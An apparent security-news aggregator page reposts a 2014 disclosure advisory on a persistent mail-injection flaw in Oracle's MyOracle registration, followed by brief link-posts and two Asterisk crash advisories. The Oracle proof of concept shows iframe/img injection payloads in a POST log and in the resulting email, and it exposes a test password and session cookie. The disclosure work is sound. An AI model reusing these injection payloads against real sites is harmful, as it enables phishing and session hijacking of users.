Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Oracle Corporation MyOracle - Persistent Vulnerability

September 18, 2014, 5:00 am
$
0
0
Document Title:
===============
Oracle Corporation MyOracle - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1261

Oracle Security ID (Team Tracking ID): admin@vulnerability-lab.com-001:2014

http://vulnerability-db.com/magazine/articles/2014/09/17/oracle-corporation-fixed-vulnerability-myoracle-online-service-application


Release Date:
=============
2014-09-17


Vulnerability Laboratory ID (VL-ID):
====================================
1261


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, California, United States.
The company specializes in developing and marketing computer hardware systems and enterprise software products – particularly its own brands
of database management systems. Oracle is the second-largest software maker by revenue, after Microsoft. The company also builds tools for
database development and systems of middle-tier software, enterprise resource planning (ERP) software, customer relationship management (CRM)
software and supply chain management (SCM) software. Larry Ellison, a co-founder of Oracle, has served as Oracle`s CEO throughout its history.
He also served as the Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008, the Associated Press
ranked Ellison as the top-paid chief executive in the world.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Oracle Corporation `MyOracle` service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014 October CPU Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A filter and persistent input validation mail encoding web vulnerability has been discovered in the official Oracle Corporation `MyOracle` service web-application.
The vulnerability allows to bypass the regular web/system validation to inject own script codes in outgoing emails of the account system mail server service.

The vulnerability is located in the name values of the my-oracle `registration` module. Remote attackers are able to inject in the first and lastname input fields of the
registration formular own script codes via POST method request. The injected script code activates the account mail service notification which returns with the persistent
code in the myoracle token activation site. The issue impact a critical risk because an attacker is able to inject own tokens or can manipulate the full mail body context.
Further send notification mails by the myoracle service can also be affected by the issue. The encoding of the server does not recognize outgoing service mails which
results in the persistent issue in outgoing emails. The injection point is a profile values update or directly the remote registration itself. The security risk of the
persistent mail encoding and filter web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.

Exploitation of the vulnerability requires low user interaction and no privileged application user account. Successful exploitation results in persistent session hijacking
attacks, unauthorized external redirects to malicious sources and persistent manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Service(s):
                                [+] MyOracle

Vulnerable Module(s):
                                [+] Registration (exp.)

Vulnerable Parameter(s):
                                [+] Profile name values (firstname & lastname ...)


[Sender]:
                                [+] oracle-acct_ww@oracle.com

[Receiver]:
                                [+] admin@evolution-sec.com & bkm@evolution-sec.com


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low user interaction and without privileged application user account.
For security demonstration or to reproduce the persistent mail encoding web vulnerability follow the provided information and steps below to continue.

Sender Mailbox - Main Oracle Server
oracle-acct_ww@oracle.com

Affected Mailbox - Receiver/Victim
admin@evolution-sec.com
bkm@evolution-sec.com


Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?nextURL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3


Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0


After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0


-- PoC Session Logs [POST] ---

20:16:31.280[4105ms][total 4105ms] Status: 302[Moved Temporarily]
POST https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[720] Mime Type[text/html]
   Request Header:
      Host[myprofile.oracle.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
      Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%22%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D; optimizelyEndUserId=oeu1398447211204r0.7026125166698021; optimizelyBuckets=%7B%7D; s_cc=true; s_fid=343B504EB719CF63-1174BEDEC7EE3C0B; s_nr=1398449779754; gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2FcreateUser.jspx%3FnextURL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpls%252Forasso%252Forasso.wwsso_app_admin.ls_login%253FSite2pstoreToken%253Dv1.2%257E656BF073%257E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0; s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BTrPage._autoSubmit('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%25257D%2526oidt%253D2%2526ot%253DCHECKBOX; p_org_id=1001; p_lang=US; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3; atgPlatoStop=1; BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%253ARED%253B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%2522%253EOracle%253C/span%253E%2520University%2520Home%2523%2523levelUrl%253A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_id%253D3%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D; JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!1006513418!189473844; BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000; notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd; s_eVar21=CLD-hp-panel-build-business-intelligence]
      Connection[keep-alive]
   POST-Daten:
      ops[Bitte+w%C3%A4hlen+Sie+...]
      drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
      drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4hlen]
      err[FEHLER]
      reqd[Erforderliches+Feld.]
      lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
      unamefield[admin%40evolution-sec.com]
      passwd1[Keymaster148%21]
      passwd2[Keymaster148%21]
      givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_jtitle[pentester]
      usr_ctry[41]
      usr_state[6]
      usr_cty[Kassel]
      companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_line1[bremerstrasse+1337]
      usr_line2[]
      usr_postal_code[34125]
      telephonenumber[573246234]
      usr_srv_otn[t]
      usr_srv_cio[t]
      usr_nsl_psn[t]
      org.apache.myfaces.trinidad.faces.FORM[f1]
      _noJavaScript[false]
      javax.faces.ViewState[%2118erzf7qoc]
      event[]
      source[cb1]
      partial[]
   Response Header:
      Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
      X-Frame-Options[sameorigin]
      Content-Type[text/html]
      Content-Language[en]
      Content-Encoding[gzip]
      Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=122956956898568077,0)]
      Content-Length[720]
      Vary[Accept-Encoding]
      Date[Fri, 25 Apr 2014 18:16:45 GMT]
      Connection[keep-alive]






PoC: Exploitcode in Mail

<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>Betreff: </b>Bitte verifizieren Sie Ihren Oracle Account</td></tr><tr><td><b>Von: </b>oracle-acct_ww@oracle.com</td></tr><tr><td><b>Datum: </b>25.04.2014 20:16</td></tr></tbody></table><table class="header-part2" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An: </b>admin@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; "><table cellpadding="0" cellspacing="0" align="center" border="0" width="640"><tbody><tr><td style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px; border-left:#CCCCCC solid 1px; background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td style="background-color:#FF0000;"><a href="http://www.oracle.com" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/302715.gif" alt="Oracle Corporation" border="0" height="30" hspace="12" width="123"></a></td></tr><tr><td style="padding:15 15 15 15; font-family:Arial, Helvetica, sans-serif; font-size:12px; color:#333333;">Sehr geehrte(r) "><iframe src="http://www.vulnerability-lab.com">%20"><img src="x">,<br><br>Bitte klicken Sie zum Bestätigen Ihres Accounts auf den folgenden Link. Der Link ist 5 Tage lang gültig.<br><br><a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE"><font color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle Benutzername: admin@evolution-sec.com<br><br><b>Warum Email Verifizierung?</b><br><li>Schutz Ihrer Daten</li><li>Zugriff auf Oracle Anwendungen und Websites, die eine Verifizierung erfordern</li><br><br><b>Der Link zur Accountverifizierung funktioniert nicht?</b><br>Sollte der obige Link nicht funktionieren können Sie zur Verifizierung Ihrer Emailadresse auch die folgende URL kopieren und in Ihren Browser einfügen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE]<br><br><b>Sie wollen eine weitere Bestätigungsemail generieren?</b><br>1) <a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx" target="_blank"><font color="#FF0000">Melden Sie sich bei Ihrem Account an.</font></a><br>2) Klicken Sie auf den Link "Account verifizieren" oder "Account erneut verifizieren". <br><br>Vielen Dank.<br>Das Oracle Account Team</font><br><br><hr style="color:#CCCCCC; height:1px;" /><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre Nutzung der Oracle Websites und Services der <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000">Servicebedingungen</font></a> unterliegt.<br><br>Verwaltung Ihres Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen Änderungen, damit wir Ihnen im Falle von Problemen mit dem Kontozugriff behilflich sein können. Melden Sie sich dafür zunächst an und klicken Sie dann auf den Link "Benutzernamen ändern" auf Ihrer Oracle Account-Seite.<br><br>Aktualisieren der Kommunikationseinstellungen für Ihre Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen der Kommunikationseinstellungen für Ihre Emailadresse zu aktualisieren.<br><br>Sie haben diese Email erhalten, da vor kurzem für diese Emailadresse ein Benutzerkonto auf der Oracle Website erstellt wurde. Wenn Sie in letzter Zeit kein Benutzerkonto auf der Oracle Website erstellt haben, <a href="http://apex.oracle.com/pls/otn/f?p=42988:3" target="_blank"><font color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei Zugriffs- oder Anmeldeproblemen <a href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::" target="_blank"><font color="#FF0000">klicken Sie bitte hier</a>.</font><br></tr><tr><td style="padding:15 15 15 15; border-top:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px;"><a href="http://www.oracle.com/us/corporate/index.html" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/196263.gif" alt="Hardware and Software Engineered to Work Together" width="174" height="50" border="0" /></a></td></tr><tr><td><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td height="25" style="padding:0 0 0 15;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td align="right" style="padding:0 15 0 0;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333"> <a href="http://www.oracle.com/de/corporate/contact/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Kontakt</u></font></a> | <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Rechtliche Hinweise und Nutzungsbedingungen</u></font></a> | <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td></tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></html>


Script Code Payload:
><iframe src="http://www.vulnerability-lab.com">%20"><img src="http://evolution-sec.com/sites/default/files/65-2_0.png">



Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=x
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken


Picture(s):
                                ../1.png
                                ../2.png
                                ../3.png


Resource(s):
                                ../Account verifizieren.htm
                                ../Bitte verifizieren Sie Ihren Oracle Account.html
                                ../Bitte verifizieren Sie Ihren Oracle Account_poc.html
                                ../poc.txt


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable first- and last-name input fields in the myoracle application.
Encode stored data of user in the dbms when processing to send service notifications by the mail info@oracle email to prevent persistent injection attacks.


Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the myoracle account system web-server is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com               - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
Search

Escalating Futex

September 18, 2014, 8:10 am
$
0
0
Last time we went over the two bugs in the futex kernel module and how these bugs allow us to potentially control a node in some kernel-residing linked list.

This time, we'll discuss how to leverage these bugs in order to achieve a limited form of kernel write, or to be more precise: "write an uncontrolled value to a controlled address".

more here............http://blog.nativeflow.com/escalating-futex

Announcing Keyless SSL™: All the Benefits of CloudFlare Without Having to Turn Over Your Private SSL Keys

September 18, 2014, 11:04 am
$
0
0
CloudFlare is an engineering-driven company. This is a story we're proud of because it embodies the essence of who we are: when faced with a problem, we found a novel solution. Technical details to follow but, until then, welcome to the no hardware world.

more here.............http://blog.cloudflare.com/announcing-keyless-ssl-all-the-benefits-of-cloudflare-without-having-to-turn-over-your-private-ssl-keys/

The Post Exploitation Team

September 18, 2014, 11:56 am
$
0
0
I often get asked about red team skills and training. What should each team member know how to do? For exercises or long running attack simulations, I believe it’s fruitful to put junior members into the post-exploitation role first. This post describes the post-exploitation team, where they fit into the overall engagement, and their core tasks and skills.

more here............http://blog.cobaltstrike.com/2014/09/18/once-you-own-a-network/

Let’s Talk About NewPosThings

September 18, 2014, 11:58 am
$
0
0
NewPosThings is a point of sale (PoS) malware family that ASERT has been tracking for a few weeks. It operates similarly to other PoS malware by memory scraping processes looking for credit card track data and then exfiltrating the spoils to a command and control (C2) server. Based on compilation times, it has been in active development since at least October 20, 2013—with the latest timestamp being August 12, 2014. Since we haven’t come across any public details of this family, we’re releasing our malware analysis for posterity and to get ahead of the threat.


more here.............http://www.arbornetworks.com/asert/2014/09/lets-talk-about-newposthings/

AST-2014-010: Remote crash when handling out of call message in certain dialplan configurations

September 18, 2014, 12:27 pm
$
0
0
  Asterisk Project Security Advisory - AST-2014-010

         Product        Asterisk
         Summary        Remote crash when handling out of call message in
                        certain dialplan configurations
    Nature of Advisory  Remotely triggered crash of Asterisk
      Susceptibility    Remote authenticated sessions
         Severity       Minor
      Exploits Known    No
       Reported On      05 September 2014
       Reported By      Philippe Lindheimer
        Posted On       18 September 2014
     Last Updated On    September 18, 2014
     Advisory Contact   Matt Jordan <mjordan AT digium DOT com>
         CVE Name       Pending

    Description  When an out of call message - delivered by either the SIP
                 or PJSIP channel driver or the XMPP stack - is handled in
                 Asterisk, a crash can occur if the channel servicing the
                 message is sent into the ReceiveFax dialplan application
                 while using the res_fax_spandsp module.

                 Note that this crash does not occur when using the
                 res_fax_digium module.

                 While this crash technically occurs due to a configuration
                 issue, as attempting to receive a fax from a channel driver
                 that only contains textual information will never succeed,
                 the likelihood of having it occur is sufficiently high as
                 to warrant this advisory.

    Resolution  The fax family of applications have been updated to handle
                the Message channel driver correctly. Users using the fax
                family of applications along with the out of call text
                messaging features are encouraged to upgrade their versions
                of Asterisk to the versions specified in this security
                advisory.

                Additionally, users of Asterisk are encouraged to use a
                separate dialplan context to process text messages. This
                avoids issues where the Message channel driver is passed to
                dialplan applications that assume a media stream is
                available. Note that the various channel drivers and stacks
                provide such an option; an example being the SIP channel
                driver's outofcall_message_context option.

                               Affected Versions
                         Product                       Release
                                                       Series
                  Asterisk Open Source                  11.x    All versions
                  Asterisk Open Source                  12.x    All versions
                   Certified Asterisk                   11.6    All versions

                                  Corrected In
                            Product                              Release
                     Asterisk Open Source                    11.12.1, 12.5.1
                      Certified Asterisk                       11.6-cert6

                                     Patches
                                SVN URL                              Revision
   http://downloads.asterisk.org/pub/security/AST-2014-010-11.diff   Asterisk
                                                                     11
   http://downloads.asterisk.org/pub/security/AST-2014-010-12.diff   Asterisk
                                                                     12
   http://downloads.asterisk.org/pub/security/AST-2014-010-11.6.diff Certified
                                                                     Asterisk
                                                                     11.6

    Links  https://issues.asterisk.org/jira/browse/ASTERISK-24301

    Asterisk Project Security Advisories are posted at
    http://www.asterisk.org/security

    This document may be superseded by later versions; if so, the latest
    version will be posted at
    http://downloads.digium.com/pub/security/AST-2014-010.pdf and
    http://downloads.digium.com/pub/security/AST-2014-010.html

                                Revision History
          Date                  Editor                 Revisions Made
    September 18       Matt Jordan               Initial Draft

               Asterisk Project Security Advisory - AST-2014-010
              Copyright (c) 2014 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2014-009: Remote crash based on malformed SIP subscription requests

September 18, 2014, 12:27 pm
$
0
0
Asterisk Project Security Advisory - AST-2014-009

         Product        Asterisk
         Summary        Remote crash based on malformed SIP subscription
                        requests
    Nature of Advisory  Remotely triggered crash of Asterisk
      Susceptibility    Remote authenticated sessions
         Severity       Major
      Exploits Known    No
       Reported On      30 July, 2014
       Reported By      Mark Michelson
        Posted On       18 September, 2014
     Last Updated On    September 18, 2014
     Advisory Contact   Mark Michelson <mmichelson AT digium DOT com>
         CVE Name       Pending

    Description  It is possible to trigger a crash in Asterisk by sending a
                 SIP SUBSCRIBE request with unexpected mixes of headers for
                 a given event package. The crash occurs because Asterisk
                 allocates data of one type at one layer and then interprets
                 the data as a separate type at a different layer. The crash
                 requires that the SUBSCRIBE be sent from a configured
                 endpoint, and the SUBSCRIBE must pass any authentication
                 that has been configured.

                 Note that this crash is Asterisk's PJSIP-based
                 res_pjsip_pubsub module and not in the old chan_sip module.

    Resolution  Type-safety has been built into the pubsub API where it
                previously was absent. A test has been added to the
                testsuite that previously would have triggered the crash.

                               Affected Versions
                        Product                       Release
                                                      Series
                  Asterisk Open Source                 1.8.x   Unaffected
                  Asterisk Open Source                 11.x    Unaffected
                  Asterisk Open Source                 12.x    12.1.0 and up
                   Certified Asterisk                 1.8.15   Unaffected
                   Certified Asterisk                  11.6    Unaffected

                                  Corrected In
                         Product                              Release
                  Asterisk Open Source                        12.5.1

                                    Patches
                                SVN URL                              Revision
   http://downloads.asterisk.org/pub/security/AST-2014-009-12.diff   Asterisk
                                                                     12

    Links  https://issues.asterisk.org/jira/browse/ASTERISK-24136

    Asterisk Project Security Advisories are posted at
    http://www.asterisk.org/security

    This document may be superseded by later versions; if so, the latest
    version will be posted at
    http://downloads.digium.com/pub/security/AST-2014-009.pdf and
    http://downloads.digium.com/pub/security/AST-2014-009.html

                                Revision History
         Date            Editor                  Revisions Made
    19 August, 2014  Mark Michelson  Initial version of document

               Asterisk Project Security Advisory - AST-2014-009
              Copyright (c) 2014 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

CoreGraphics Information Disclosure - CVE-2014-4378

September 18, 2014, 12:50 pm
$
0
0
Apple CoreGraphics library fails to validate input when parsing the colorspace specification of an inline image embedded in a PDF content stream. This issue is an information leak vulnerability that improves the exploitability scenario of any application linked with this library. This enables the bypass of exploit mitigations such as ASLR/DEP/CodeSigning. In particular this article explores the exploitability of MobileSafari on IOS 7.1.x. This bug makes it possible to leak information about the memory layout to the MobileSafari Javascript environment using a crafted PDF file as an image improving the ability to exploit other issues.

more here...........http://blog.binamuse.com/2014/09/coregraphics-information-disclosure.html
Search

